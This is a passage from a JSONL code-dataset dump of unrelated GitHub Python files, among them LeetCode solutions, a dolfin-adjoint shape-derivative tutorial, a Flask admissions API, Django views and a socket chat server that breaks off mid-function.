))\n","repo_name":"sakshamratra0106/PracticeProblems","sub_path":"DSAPracticeSheets/String/11Findexcelcolumnnamefromagivencolumnnumber.py","file_name":"11Findexcelcolumnnamefromagivencolumnnumber.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40438739719","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Date: 2016-12-10 23:57:46\n# @Last Modified by: Lich_Amnesia\n# @Last Modified time: 2016-12-10 23:57:46\n# @Email: shen.huang@colorado.edu\n\nclass Solution(object):\n def validWordSquare(self, words):\n \"\"\"\n :type words: List[str]\n :rtype: bool\n \"\"\"\n n = len(words)\n m = len(words[0]) if n else 0\n if n != m:\n return False\n for x in range(n):\n len_s = len(words[x])\n c = 0\n for y in range(n):\n if len(words[y]) < x + 1:\n break\n c += 1\n if c != len_s:\n return False\n for y in range(len_s):\n if words[x][y] != words[y][x]:\n return False\n return True","repo_name":"LichAmnesia/LeetCode","sub_path":"python/422.py","file_name":"422.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72367167592","text":"class School(object):\n def __init__(self, student_list):\n self.students = student_list\n\n def __getitem__(self, item):\n return self.students[item]\n\n\nstudent_list = ['a', 's', 'f', 't']\n\nstudents = School(student_list)\n# 定义了getitem方法,可以实现index索引取值\nprint(students[2])\n\n# for循环时,当找不到__iter__方法时,会查\n# 找__getitem__方法,有就可以实现循环取值\nfor student in students:\n print(student)\n","repo_name":"CuteSmartTiger/keeplearning","sub_path":"fluent Python/magic method/getitem.py","file_name":"getitem.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"33440844508","text":"from .imports import *\nfrom .utils import *\n\n__all__ = ['TensorList', 'tensor_lists_from_arrays']\n\nclass TensorItem(ItemBase):\n \"`ItemBase` suitable for Tensors\"\n\n def __init__(self, item):\n super().__init__(item)\n self.channels = item.shape[-2]\n self.seq_len = item.shape[-1]\n\n\n def __str__(self):\n return 'TensorItem(ch={:.0f}, seq_len={:.0f})'.format(\n self.channels, self.seq_len)\n\n def clone(self):\n return self.__class__(self.data.clone())\n\n def apply_tfms(self, tfms, **kwargs):\n x = self.clone()\n for tfm in tfms:\n x.data = tfm(x.data)\n return x\n\n def reconstruct(self, item):\n return TensorItem(item)\n\n def show(self, ax=None, title=None, **kwargs):\n if ax is None:\n plt.plot(*self.data)\n plt.show()\n else:\n ax.plot(*self.data)\n ax.title.set_text(title)\n ax.tick_params(\n axis='both',\n which='both',\n bottom='off',\n top='off',\n labelbottom='off',\n right='off',\n left='off',\n labelleft='off')\n return ax\n\nclass TensorPreProc(PreProcessor):\n\n def __init__(self, ds: ItemList): self.ds = ds\n\n def process(self, ds: ItemList):\n ds.features, ds.seq_len = self.ds.get(0).data.size(-2), self.ds.get(0).data.size(-1)\n\n\nclass TensorList(ItemList):\n \"`ItemList` suitable for Tensor\"\n _processor = TensorPreProc\n _label_cls = None\n _square_show = True\n\n def __init__(self, items, *args, mask=None, tfms=None, **kwargs):\n items = to3dtensor(items)\n super().__init__(items, *args, **kwargs)\n self.tfms,self.mask = tfms,mask\n self.copy_new.append('tfms')\n\n def get(self, i):\n item = super().get(i)\n if self.mask is None: return TensorItem(to2dtensor(item))\n else: return[TensorItem(to2dtensor(item[m])) for m in self.mask]\n\n\n def show_xys(self, xs, ys, figsize=(10, 10), **kwargs):\n \"Show the `xs` and `ys` on a figure of `figsize`. `kwargs` are passed to the show method.\"\n rows = int(math.sqrt(len(xs)))\n fig, axs = plt.subplots(rows, rows, figsize=figsize)\n for x, y, ax in zip(xs, ys, axs.flatten()):\n with np.printoptions(precision=3, suppress=True): #print only 3 decimals in title\n x.show(ax=ax, title=str(y), **kwargs)\n # plt.tight_layout()\n plt.show()\n\n def show_xyzs(self, xs, ys, zs, figsize=(10, 10), **kwargs):\n if self._square_show_res:\n rows = int(np.ceil(math.sqrt(len(xs))))\n fig, axs = plt.subplots(\n rows,\n rows,\n figsize=figsize)\n for x, y, z, ax in zip(xs, ys, zs, axs.flatten()):\n x.show(ax=ax, title=f'{str(y)}\\n{str(z)}', **kwargs)\n else:\n fig, axs = plt.subplots(\n len(xs),\n 2,\n figsize=figsize)\n for i, (x, y, z) in enumerate(zip(xs, ys, zs)):\n x.show(ax=axs[i, 0], title=str(y), **kwargs)\n ##TODO replace this curve with the computed one from pvlib\n x.show(ax=axs[i, 1], title=str(z), **kwargs)\n # plt.tight_layout()\n plt.show()\n\n @classmethod\n def from_array(cls, ts, **kwargs):\n return cls(ts)\n\n @classmethod\n def from_df(cls, df, path='.', cols=None, feat=None, processor=None, **kwargs) -> 'ItemList':\n \"Create an `ItemList` in `path` from the inputs in the `cols` of `df`.\"\n if cols is 0:\n inputs = df\n else:\n col_idxs = df_names_to_idx(list(cols), df)\n inputs = df.iloc[:, col_idxs]\n assert inputs.isna().sum().sum() == 0, f\"NaN values in column(s) {cols} of your dataframe, fix it.\"\n inputs = df2array(inputs, feat)\n res = cls(\n items=inputs,\n path=path,\n inner_df=df,\n processor=processor,\n **kwargs)\n return res\n\ndef tensor_lists_from_arrays(X_train, y_train, X_valid, y_valid, label_cls=FloatList):\n src = ItemLists('.', TensorList(X_train), TensorList(X_valid))\n return src.label_from_lists(y_train, y_valid, label_cls=FloatList)","repo_name":"tcapelle/tabular_image_models","sub_path":"cape_core/tensordata.py","file_name":"tensordata.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"25570391396","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# .. _tube-shape-derivative-example:\n#\n# .. py:currentmodule:: dolfin_adjoint\n#\n# Tube shape-derivatives\n# ======================\n#\n# .. sectionauthor:: Simon W. Funke , Jørgen Dokken , Stephan Schmidt \n#\n# This example demonstrates how to compute shape-derivatives in morphing domains (including tube shape-derivatives)\n# using dolfin-adjoint.\n\n# Problem definition\n# ******************\n#\n# We consider the problem of computing the sensitivity of the goal functional $J$\n#\n# .. math::\n# \\min_{u, \\Omega(t), t<0_\\Omega = \\frac{1}{2} \\Delta t (\\left_\\Omega),\n#\n# where the super-scripts denote the timelevels.\n#\n# In code, this becomes:\n\ns = TrialFunction(V)\nz = TestFunction(V)\nS = Function(V)\nX = SpatialCoordinate(mesh)\nrot = lambda y: 2*pi*omega*as_vector((y[1], -y[0]))\nF_s = lambda thn: inner(thn, z)*dx\\\n - dt*0.5*inner(rot(X+thn)+rot(X), z)*dx\n\n# In the time-loop, the solution :math:`S^n` will be used to update the mesh coordinates for the next time-level.\n#\n# Next, we derive the standard weak variational form for the diffusion-convection equation.\n# We integrate the diffusion and advection term by parts in order to weakly enforce the\n# boundary conditions on the outer circle. This yields: Find :math:`u` such that for all test\n# functions :math:`v`\n#\n# .. math::\n# \\left_\\Omega + k \\left<\\nabla (u), \\nabla (v)\\right>_\\Omega + \\left_{\\Omega} = 0\n#\n# Discretising this equation in time using a Crank-Nicolson scheme yields the fully discretised problem:\n# Find :math:`u^n` such that for all test\n# functions :math:`v`\n#\n# .. math::\n\n# F_u(u^n, u^{n-1}, S^n;v) =&\\ \\frac{1}{\\Delta t}\\left_\\Omega \\\\\n# &\\ + k \\left<\\nabla u^{n+1/2}, \\nabla v\\right>_\\Omega \\\\\n# &\\ + \\left_{\\Omega}\n# =&\\ 0\n#\n# where the super-scripts denote the timelevel and the intermediate timelevels are defined as :math:`u^{n+1/2}:=\\frac{1}{2} u^n + \\frac{1}{2} u^{n-1}` and\n# the mesh morphing velocity at :math:`X_t` at the intermediate timestep is approximated as :math:`X_t^{n+1/2}=\\frac{1}{2} X_t^n + \\frac{1}{2} X_t^{n-1} \\approx \\frac{1}{2\\Delta t} S^n + \\frac{1}{2} rot(X)`.\n#\n# In code, this becomes:\n\nu0 = Function(W)\nu1 = Function(W)\nv = TestFunction(W)\nw = TrialFunction(W)\nF_u = lambda V: (1.0/dt*(w-u0)*v*dx\n + k*inner(grad(v),Constant(1/2)*(grad(w)+grad(u0)))*dx\n + inner(Constant(1/2)*(w+u0)*V, grad(v))*dx)\n\n# Next, we define the Dirichlet boundary condition on the inner circle. The inner boundary edges are already marked\n# in the mesh, so this is achieved with:\n\nbc = DirichletBC(W, Constant(1.0), bdy_markers, 2)\n\n\n# Next, we define the set of deformation functions.\n# These functions will store the mesh coordinates changes\n# from one timestep to the next and will be solved\n# using the mesh deformation PDE above. Hence,\n# we need as many deformation functions as there are\n# timesteps in model (N). Later, we compute the derivative with respect\n# to these variables with dolfin-adjoint.\n\nthetas = [Function(V) for i in range(N+1)]\n\n# The mesh movement per time-step is decomposed into a static component (mesh rotation) and a dynamic component (the control variables in thetas).\n# The create a function which should contain the total movement per time-step, and assign the first control variable to it, assuming that the system starts from a static position.\n\nS_tot = [Function(V) for i in range(N+1)]\nS_tot[0].assign(thetas[0])\n\n# Now we can implement the timeloop. It consist of four main steps:\n#\n# 1. Solve the mesh deformation PDE to compute the changes in mesh coordinates. During the shape-derivative step and add the control variable to the movement.\n# 2. Update the mesh coordinates (using `ALE.move`);\n# 3. Solve the advection-diffusion PDE;\n# 4. Compute the contribution to the objective functional.\n#\n# The code is as follows:\n\nALE.move(mesh, S_tot[0])\n\nfor i in range(N):\n print(\"t=%.2f\"%(float(i*dt)))\n\n # Solve for the fixed mesh displacement and assign this movement\n # summed with the control movement to the movement vector\n a, L = system(F_s(s))\n solve(a==L, S)\n S_tot[i+1].assign(S + thetas[i+1])\n\n # Move mesh\n ALE.move(mesh, S_tot[i+1])\n\n\n # Solve for state\n a, L = system(F_u(0.5/dt*(S_tot[i]+S_tot[i+1])))\n solve(a==L, u1, bc)\n u0.assign(u1)\n fout << u1\n\n # Compute functional\n J += assemble(dt*inner(grad(u1), grad(u1))*dx)\n\n# This concludes the forward model, and we can now focus on computing the shape derivatives.\n# As a first step, we define the control variables and the reduced functional. The control\n# variables are the mesh deformation functions for all timesteps:\n\nS_ctrls = thetas\nctrls = [Control(s) for s in S_ctrls]\nJhat = ReducedFunctional(J, ctrls)\n\n# Now, we can run a Taylor test to verify the correctness of the shape derivatives and shape Hessian that dolfin-adjoint\n# computes. The Taylor test performs a Taylor expansion in a user-specified perturbation direction.\n# Since we have N control functions, we also need to specify N perturbation directions:\n\n\nperbs = [project(0.01*Expression([\"1-x[0]*x[0]-x[1]*x[1]\", \"1-x[0]*x[0]-x[1]*x[1]\"], degree=2), V) for _ in ctrls]\nconv = taylor_to_dict(Jhat, S_ctrls, perbs)\npprint(conv)\n\n# Finally, we store the shape derivative for visualisation:\n\ndJdm = Jhat.derivative()\nmesh.coordinates()[:] = original_mesh.data()\n\noutput = File(\"output/dJdOmega.pvd\")\nout = Function(V)\nfor s, dj in zip(S_tot, dJdm):\n ALE.move(mesh, s)\n out.assign(dj)\n output << out\n\n\n# The example code can be found in ``examples/tube-shape-derivative`` in\n# the ``dolfin-adjoint`` source tree, and executed as follows:\n#\n#\n# .. code-block:: bash\n#\n# $ python tube-shape-derivative.py\n#\n# ...\n# {'R0': {'Rate': [0.99233621799267857, 0.9961586867939265,\n# 0.99807699260441085],\n# 'Residual': [0.5980325614382096,\n# 0.3006089201505162,\n# 0.15070519330050303,\n# 0.07545310314151976]},\n# 'R1': {'Rate': [1.99381570097023, 1.996905781695665, 1.9984531246419335],\n# 'Residual': [0.00639804263023247,\n# 0.0016063818837048216,\n# 0.0004024577166074905,\n# 0.00010072236703549675]},\n# 'R2': {'Rate': [2.9965354427868878, 2.998667114984213,\n# 2.9994355259119714],\n# 'Residual': [5.510229348307336e-05,\n# 6.904347224064239e-06,\n# 8.638411247309367e-07,\n# 1.0802239755861346e-07]},\n# 'eps': [0.01, 0.005, 0.0025, 0.00125]}\n\n\n# The output shows the expected convergence rate for the finite difference (FD) test, first order adjoint test (dJdm),\n# and second order adjoint test.\n","repo_name":"dolfin-adjoint/pyadjoint","sub_path":"examples/tube-shape-derivative/tube-shape-derivative.py","file_name":"tube-shape-derivative.py","file_ext":"py","file_size_in_byte":10308,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"72"} +{"seq_id":"14524285686","text":"#Implemente um programa em Python em que o usuário entre com a idade de várias \n#pessoas em anos e imprimir: \n#- total de pessoas com menos de 18 anos; \n#- total de pessoas com mais de 60 anos;\n#- para finalizar o programa, deve-se entrar com idade igual a 0 (zero).\nx= 1\nop= 1\nmaior= 0\nmenor= 0\n\nwhile op != 0:\n \n op=int(input(\"\\n(1) Para digitar o nome de uma pessoa\\n(0) Para sair:\\n\"))\n\n if op == 0:\n break\n elif op == 1:\n name=input(\"\\nNome da %dº pessoa:\\n\" % x)\n idade=int(input(\"\\nIdade: \"))\n if idade < 18:\n menor= menor + 1\n elif idade > 60:\n maior= maior + 1\n x= x+1\n\n elif op != 0 and op != 1:\n print(\"\\nOpção inválida\")\n \nprint(\"\\nQuantidade de pessoas com menos de 18 anos: %d\" % menor, \"\\n\")\nprint(\"\\nQuantidade de pessoas com mais de 60 anos: %d\" % maior, \"\\n\")\n\n\n ","repo_name":"Peterson-Paganelli/Faculdade_old","sub_path":"Avaliacao3.py","file_name":"Avaliacao3.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38282516325","text":"# import nltk\n# nltk.download('popular')\n# from nltk.stem import WordNetLemmatizer\n# lemmatizer = WordNetLemmatizer()\n# import pickle\n# import numpy as np\n\n# from keras.models import load_model\n# model = load_model('model.h5')\n# import json\n# import random\n# intents = json.loads(open('data.json').read())\n# words = pickle.load(open('texts.pkl','rb'))\n# classes = pickle.load(open('labels.pkl','rb'))\n\n# def clean_up_sentence(sentence):\n# # tokenize the pattern - split words into array\n# sentence_words = nltk.word_tokenize(sentence)\n# # stem each word - create short form for word\n# sentence_words = [lemmatizer.lemmatize(word.lower()) for word in sentence_words]\n# return sentence_words\n\n# # return bag of words array: 0 or 1 for each word in the bag that exists in the sentence\n\n# def bow(sentence, words, show_details=True):\n# # tokenize the pattern\n# sentence_words = clean_up_sentence(sentence)\n# # bag of words - matrix of N words, vocabulary matrix\n# bag = [0]*len(words) \n# for s in sentence_words:\n# for i,w in enumerate(words):\n# if w == s: \n# # assign 1 if current word is in the vocabulary position\n# bag[i] = 1\n# if show_details:\n# print (\"found in bag: %s\" % w)\n# return(np.array(bag))\n\n# def predict_class(sentence, model):\n# # filter out predictions below a threshold\n# p = bow(sentence, words,show_details=False)\n# res = model.predict(np.array([p]))[0]\n# ERROR_THRESHOLD = 0.25\n# results = [[i,r] for i,r in enumerate(res) if r>ERROR_THRESHOLD]\n# # sort by strength of probability\n# results.sort(key=lambda x: x[1], reverse=True)\n# return_list = []\n# for r in results:\n# return_list.append({\"intent\": classes[r[0]], \"probability\": str(r[1])})\n# return return_list\n\n# def getResponse(ints, intents_json):\n# tag = ints[0]['intent']\n# list_of_intents = intents_json['intents']\n# for i in list_of_intents:\n# if(i['tag']== tag):\n# result = random.choice(i['responses'])\n# break\n# return result\n\n# def chatbot_response(msg):\n# ints = predict_class(msg, model)\n# res = getResponse(ints, intents)\n# return res\n\n\nfrom flask import Flask, render_template, request, jsonify\nimport database.utils as db\n\napp = Flask(__name__)\napp.static_folder = 'static'\n\n# @app.route(\"/get\")\n# def get_bot_response():\n# userText = request.args.get('msg')\n# return chatbot_response(userText)\n\n@app.route(\"/school\", methods = [\"GET\"])\ndef getSchoolInfo():\n data = db.school()\n return jsonify(\n {\n \"id\": data[0],\n \"name\": data[1],\n \"description\": data[2],\n \"thanhPho\": data[3],\n \"quan\": data[4],\n \"duong\": data[5],\n \"image\": data[6]\n }\n )\n\n@app.route(\"/job\", methods=[\"GET\"])\ndef getJobInfo():\n data = db.get_job_data()\n \n # Check if there is any data\n if not data:\n return jsonify({\"message\": \"No job data found\"}), 404\n\n # List to store information for all jobs\n job_list = []\n\n # Iterate through each job in data\n for job in data:\n job_info = {\n \"id\": job[0],\n \"name\": job[1],\n \"salary\": job[2],\n \"status\": job[3],\n \"description\": job[4]\n }\n job_list.append(job_info)\n\n return jsonify({\"jobs\":job_list})\n\n@app.route(\"/scholarship\", methods=[\"GET\"])\ndef get_all_scholarship_info():\n data = db.get_scholarship_data()\n \n # Check if there is any data\n if not data:\n return jsonify({\"message\": \"No scholarship data found\"}), 404\n\n # List to store information for all scholarships\n scholarship_list = []\n\n # Iterate through each scholarship in data\n for scholarship in data:\n scholarship_info = {\n \"id\": scholarship[0],\n \"loaiHb\": scholarship[1],\n \"diemYc\": scholarship[2],\n \"hanhKiemYc\": scholarship[3]\n }\n scholarship_list.append(scholarship_info)\n\n return jsonify({\"scholarships\":scholarship_list})\n\n@app.route(\"/tuition\", methods=[\"GET\"])\ndef get_tuition_info():\n data = db.get_tuition_data()\n \n # Check if there is any data\n if not data:\n return jsonify({\"message\": \"No tuition data found\"}), 404\n\n # List to store information for all tuitions\n tuition_list = []\n\n # Iterate through each tuition in data\n for tuition in data:\n tuition_info = {\n \"id\": tuition[0],\n \"soTien\": tuition[1],\n \"namHoc\": tuition[2]\n }\n tuition_list.append(tuition_info)\n\n return jsonify({\"tuitions\":tuition_list})\n\n@app.route(\"/target\", methods=[\"GET\"])\ndef get_target_info():\n data = db.get_target_data()\n\n # Kiểm tra xem có dữ liệu nào không\n if not data:\n return jsonify({\"message\": \"No target data found\"}), 404\n\n # List để lưu thông tin cho tất cả các chỉ tiêu\n target_list = []\n\n # Duyệt qua mỗi chỉ tiêu trong dữ liệu\n for target in data:\n target_info = {\n \"id\": target[0],\n \"nam\": target[1],\n \"soLuong\": target[2],\n \"phuongThuc\": target[3]\n }\n target_list.append(target_info)\n\n return jsonify({\"targets\":target_list})\n\n@app.route(\"/major\", methods=[\"GET\"])\ndef get_major_info():\n data = db.get_major_data()\n\n # Kiểm tra xem có dữ liệu nào không\n if not data:\n return jsonify({\"message\": \"No major data found\"}), 404\n\n # List để lưu thông tin cho tất cả các ngành học\n major_list = []\n\n # Duyệt qua mỗi ngành học trong dữ liệu\n for major in data:\n major_info = {\n \"id\": major[0],\n \"tenNganh\": major[1],\n \"maNganh\": major[2],\n \"moTa\": major[3],\n \"soTin\": major[4],\n \"coSo\": major[5]\n }\n major_list.append(major_info)\n\n return jsonify({\"majors\":major_list})\n\n@app.route(\"/news\", methods=[\"GET\"])\ndef get_news_info():\n data = db.get_news_data()\n\n # Kiểm tra xem có dữ liệu nào không\n if not data:\n return jsonify({\"message\": \"No news data found\"}), 404\n\n # List để lưu thông tin cho tất cả các tin tức\n news_list = []\n\n # Duyệt qua mỗi tin tức trong dữ liệu\n for news in data:\n news_info = {\n \"id\": news[0],\n \"title\": news[1],\n \"image\": news[2],\n \"fullDescription\": news[3],\n \"time\": news[4],\n \"shortDescription\": news[5]\n }\n news_list.append(news_info)\n\n return jsonify( {\"news\":news_list})\n\n@app.route(\"/news/detail\", methods=[\"GET\"])\ndef get_news_detail_info():\n news_id = request.args.get(\"id\")\n data = db.get_news_detail(news_id)\n\n # Kiểm tra xem có dữ liệu nào không\n if not data:\n return jsonify({\"message\": f\"No news found with ID {news_id}\"}), 404\n\n # Chuẩn bị thông tin chi tiết\n news_detail = {\n \"id\": data[0],\n \"title\": data[1],\n \"image\": data[2],\n \"fullDescription\": data[3],\n \"time\": data[4],\n \"shortDescription\": data[5]\n }\n\n return jsonify(news_detail)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5001)","repo_name":"lenhathuy9281/TuVanTuyenSinhPTIT_server","sub_path":"server_chat.py","file_name":"server_chat.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1296479600","text":"\nclass Solution:\n def longestPalindrome(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n start, end = 0, 0\n\n for i in range(len(s)):\n len1 = self.expandAroundCenter(s, i, i)\n len2 = self.expandAroundCenter(s, i, i+1)\n\n length = max(len1, len2)\n if length > (end - start):\n start = i - int((length - 1) / 2)\n end = i + int(length / 2)\n\n return s[start:end+1]\n\n\n def expandAroundCenter(self, s, left, right):\n L, R = left, right\n while (L >= 0) and (R < len(s)) and s[L] == s[R]:\n L -= 1\n R += 1\n\n return R - L - 1\n\ndef stringToString(input):\n import json\n\n return json.loads(input)\n\ndef main():\n import sys\n import io\n def readlines():\n for line in io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8'):\n yield line.strip('\\n')\n\n lines = readlines()\n while True:\n try:\n line = next(lines)\n s = stringToString(line)\n\n ret = Solution().longestPalindrome(s)\n\n out = (ret)\n print(out)\n except StopIteration:\n break\n\nif __name__ == '__main__':\n main()","repo_name":"samguns/leetcode","sub_path":"005-LongestPalindromicSubstring/python/lps.py","file_name":"lps.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36055390100","text":"from coupler import *\n\norigin=(0,0)\nwidth = 1.3\ngap=3\nbend=20\ndx = 0.45\nradius_disk=40\n\np=(gap+width)*0.5\ncell = gp.Cell('test')\ncell.add(coupler(origin,width,np.pi*0.25,10,0.8,1.2,gap))\ncell.add(coupler((250,0),width,np.pi*0.25,10,0.8,1.2,gap))\n\npath1=gp.Path(gap, (origin[0]+p,origin[1]))\npath1.arc(bend-p,np.pi,np.pi*0.5).segment(210).arc(bend-p,np.pi*0.5,0)\ncell.add(path1)\n\npath2=gp.Path(gap, (origin[0]-p,origin[1]))\npath2.arc(bend+p,np.pi,np.pi*0.5).segment(210).arc(bend+p,np.pi*0.5,0)\n\norigin_disk=(origin[0]+125, origin[1]+dx+width*0.5+radius_disk+bend)\npath2=gp.fast_boolean(path2,gp.Round(origin_disk,radius_disk),'not')\ncell.add(path2)\n\nring=gp.Round(\n origin_disk,\n radius_disk+gap,\n inner_radius=radius_disk),\n\ncell.add(gp.fast_boolean(\n\tring,\n\tgp.Path(width+2*gap,\n\t\t(origin[0]+125-100,origin[1]+bend)).segment(2*100),\n\t'not'))\n\n# gp.LayoutViewer()\ngp.gds_print('disk.gds', unit=1.0e-6, precision=1.0e-9)\n","repo_name":"dboriska/pypic","sub_path":"positive/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73951204394","text":"a = int(input())\r\nli = [] # 입력하는 OX들의 리스트\r\nresultLi = [] # 점수계산한 문제들을 담은 리스트\r\n\r\n# 인풋값 리스트\r\nfor _ in range(a):\r\n li.append(str(input()))\r\n\r\nfor i in range(len(li)):\r\n score = 0\r\n result = 0\r\n for j in range(len(li[i])):\r\n if li[i][j] == \"O\":\r\n score += 1\r\n result += score\r\n else:\r\n score = 0\r\n resultLi.append(result)\r\n print(resultLi[i])","repo_name":"choihyerln/Baekjoon","sub_path":"백준/Bronze/8958. OX퀴즈/OX퀴즈.py","file_name":"OX퀴즈.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5154625639","text":"import os\nimport collections\nimport json\n\ndata = collections.OrderedDict()\n\ndata[\"Name\"] = ''\ndata[\"Description\"] = ''\ndata[\"BIDSVersion\"] = '1.0.0rc3'\ndata[\"License\"] = ''\ndata[\"Authors\"] = ['']\ndata[\"Funding\"] = ''\ndata[\"ReferencesAndLinks\"] = ['']\ndata['HowToAcknowledge'] = ''\ndata['DatasetDOI'] = ''\n\nbids_dir = ''\nproject_subject_label = ''\ndataset_json_folder = bids_dir + project_subject_label\ndataset_json_name = dataset_json_folder + '/' + 'dataset_description.json'\n\nwith open(dataset_json_name, 'w') as ff:\n json.dump(data, ff, sort_keys=False, indent=4)\n","repo_name":"daelsaid/fmri_processing_workflows","sub_path":"bids_templates/dataset_description_template.py","file_name":"dataset_description_template.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69896333354","text":"# apps/core/urls.py\n\n# Django modules\nfrom django.urls import path\n\n# Locals\nfrom apps.core import views\n\napp_name = 'core'\n\nurlpatterns = [\n path('', views.frontpage, name='frontpage'),\n path('contact/', views.contact, name='contact'),\n]","repo_name":"gurnitha/2022-django-multi-vendor-ytb-codewithstein","sub_path":"apps/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30826570786","text":"import torch\nimport csv\nimport numpy as np\n\nres = dict()\nwith open('/home/filou/Downloads/activ.csv') as csv_file:\n rows = csv.reader(csv_file, delimiter=',')\n next(rows, None)\n for row in rows:\n if (\"Waiting\" in row[5]\n or not(row[3])\n or row[3] == \"0\"):\n continue\n win = 1 if \"Won\" in row[5] else 0\n criterion = row[0]\n if not(criterion in res):\n res[criterion] = list()\n res[criterion].append([(float(row[3])-1.0)/4, win])\n\nprint(res)\nres['test 1'] = [ [1, 0], [1, 0], [1, 1], [1, 1], [0, 1], [0, 1], [0, 0], [0, 0]]\nres['test 2'] = [ [1, 0], [0, 1], [1, 0], [0, 1] ]\nres['test 3'] = [ [1, 1], [0.75, 1], [0.75, 1], [1, 1], [1, 0], [0.75, 0]]\nsorted_res = []\nfor crit, data in res.items():\n values = np.array(data)\n covariance = np.cov(values[:, 0], values[:, 0])[0][1]\n correlation = np.corrcoef(values[:, 0], values[:, 1])[0][1]\n corr_bis = covariance / np.sqrt(np.var(values[:, 0]) * np.var(values[:, 1]))\n sorted_res.append([correlation, crit])\n print(f\"{correlation:.2}, {crit}\")\n\nfor item in sorted(sorted_res, key=lambda x: x[0], reverse=True):\n # print(f\"{item[0]:.2}\")\n print(f\"{item[1]}\")\n # print(f\"{item[0]:.2}, {item[1]}\")\n \n","repo_name":"philipperolet/tensor","sub_path":"variance.py","file_name":"variance.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23621967814","text":"from django import template\r\nfrom users.models import Profile\r\n\r\nregister = template.Library()\r\n\r\n@register.filter(name='is_liked_by_user')\r\ndef is_liked_by_user(post, user):\r\n return post.is_liked_by_user(user)\r\n\r\n@register.filter(name='is_following')\r\ndef is_following(profile_user, current_user):\r\n try:\r\n profile = Profile.objects.get(user=current_user)\r\n return profile.following.filter(user=profile_user).exists()\r\n except Profile.DoesNotExist:\r\n return False\r\n","repo_name":"raushannerkar/social_media","sub_path":"posts/templatetags/customfilters.py","file_name":"customfilters.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13972373094","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils import timezone\nfrom .models import Book, Author\nfrom .forms import ReviewForm\n\ndef books_list(request):\n books = Book.objects.order_by('title')\n return render(request, 'books/book_list.html', {'books': books})\n\ndef books_detail(request, pk):\n book = get_object_or_404(Book, pk=pk)\n return render(request, 'books/book_detail.html', {'book': book})\n\ndef author_detail(request, pk):\n author = get_object_or_404(Author, pk=pk)\n return render(request, 'books/author_detail.html', {'author': author})\n\ndef add_review(request, pk):\n book = get_object_or_404(Book, pk=pk)\n if request.method == \"POST\":\n form = ReviewForm(request.POST)\n if form.is_valid():\n review = form.save(commit=False)\n review.book = book\n review.published_date = timezone.now()\n review.save()\n return redirect('book_detail', pk=book.pk)\n else:\n form = ReviewForm()\n return render(request, 'books/add_review.html', {'form': form})\n \n \n","repo_name":"lauosi/library-django","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38294085926","text":"import socket\nimport sys\nimport threading\n\n\ndef read_msg(clients, friends, sock_cli, addr_cli, src_username):\n #Menerima pesan\n while True:\n data = sock_cli.recv(65535)\n if len(data) == 0:\n break\n\n #parsing pesannya\n dest, msg = data.split(b\"|\", 1)\n dest = dest.decode(\"utf-8\")\n\n #Mengirim pesan ke client\n #Mengirim pesan ke semua client\n if dest == \"bcast\":\n msg = msg.decode(\"utf-8\")\n msg2 = \"<{}>: {}\".format(src_username, msg)\n send_broadcast(clients, msg2, addr_cli)\n\n #Menambah teman\n elif dest == \"addfriend\":\n dest_username = msg.decode(\"utf-8\")\n friends[src_username].append(dest_username)\n friends[dest_username].append(src_username)\n send_msg(clients[dest_username][0], f\"{src_username} is now friend\")\n send_msg(clients[src_username][0], f\"{dest_username} is now friend\")\n\n #Mengirim pesan ke semua teman\n elif dest == \"friends\":\n msg = msg.decode(\"utf-8\")\n msg2 = \"<{}>: {}\".format(src_username, msg)\n send_friends(clients, friends, src_username, msg2, addr_cli)\n \n #Mengirim file\n elif dest == \"sendfile\":\n dest_username, filename, size, filedata = msg.split(b'|', 3)\n dest_username = dest_username.decode(\"utf-8\")\n filename = filename.decode(\"utf-8\")\n size = int(size.decode(\"utf-8\"))\n\n while len(filedata) < size:\n if size-len(filedata) > 65536:\n filedata += sock_cli.recv(65536)\n else:\n filedata += sock_cli.recv(size - len(filedata))\n break\n dest_sock_cli = clients[dest_username][0]\n if dest_sock_cli is not None:\n send_file(dest_sock_cli, filename, size, filedata, src_username)\n \n #Mengirim 